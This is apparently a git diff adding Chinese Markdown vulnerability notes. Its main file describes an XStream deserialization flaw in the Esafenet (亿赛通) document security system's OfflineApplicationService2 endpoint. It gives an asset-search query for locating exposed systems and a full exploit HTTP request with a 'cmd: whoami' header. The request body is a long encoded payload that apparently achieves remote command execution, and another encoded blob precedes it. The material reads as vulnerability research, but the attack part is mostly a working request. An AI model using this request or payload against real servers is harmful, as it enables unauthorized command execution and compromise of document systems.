ECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605198795-d3a9b7aa-b389-4748-b8a1-594abba52587.png](./img/GjCIUT029FqNfeNV/1706605198795-d3a9b7aa-b389-4748-b8a1-594abba52587-124915.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fir8aulb9lzzwptq>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..8e8b216
--- /dev/null
+++ b/亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/RHal_2krZDLiIbZ5/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-959292.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/OfflineApplicationService2 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGF